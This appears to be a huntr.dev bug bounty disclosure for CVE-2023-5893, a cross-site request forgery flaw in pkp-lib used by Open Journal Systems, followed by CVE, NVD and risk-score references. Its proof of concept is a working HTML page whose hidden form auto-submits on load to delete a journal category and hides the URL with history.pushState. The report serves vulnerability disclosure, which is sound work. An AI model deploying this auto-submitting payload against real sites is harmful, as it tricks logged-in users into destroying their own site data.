Lucene search
Hainguyen0207A965AA16-79CE-4185-8F58-3D3B0D74A71EHistorySep 28, 2023 - 4:14 p.m.
CSRF Delete Categories
2023-09-2816:14:43
hainguyen0207
www.huntr.dev
4
csrf attack
fake requests
delete categories
unwanted
bug bounty
Description
CSRF Delete Categories
Proof of Concept
1 .Attack sends fake requests to users
<html>
<body>
<form action="https://demo.publicknowledgeproject.org/ojs3/testdrive/index.php/testdrive-
journal/$$$call$$$/grid/settings/category/category-category-grid/delete-category">
<input type="hidden" name="categoryId" value="6" />
<input type="submit" value="Submit request" />
</form>
<script>
history.pushState('', '', '/');
document.forms[0].submit();
</script>
</body>
</html>
2 .User clicks, deletes unwanted Categories
Payload Poc
https://drive.google.com/file/d/12cCzI-_b9KLCRlND6MmjM6j-DJfTJiIt/view?usp=sharing
Video Poc
https://drive.google.com/file/d/1y-cR_Stxg9hvk7kZp9HeObLPxQDXbpMW/view?usp=sharing
Related
osv
osv
CVE-2023-5893
2023-11-01 01:15:07
nvd
nvd
CVE-2023-5893
2023-11-01 01:15:07
cve
cve
CVE-2023-5893
2023-11-01 01:15:07
prion
prion
Cross site request forgery (csrf)
2023-11-01 01:15:00
cvelist
cvelist
CVE-2023-5893 Cross-Site Request Forgery (CSRF) in pkp/pkp-lib
2023-11-01 00:00:18
7.1 High
AI Score
Confidence
Low
0.001 Low
EPSS
Percentile
24.3%
Related for A965AA16-79CE-4185-8F58-3D3B0D74A71E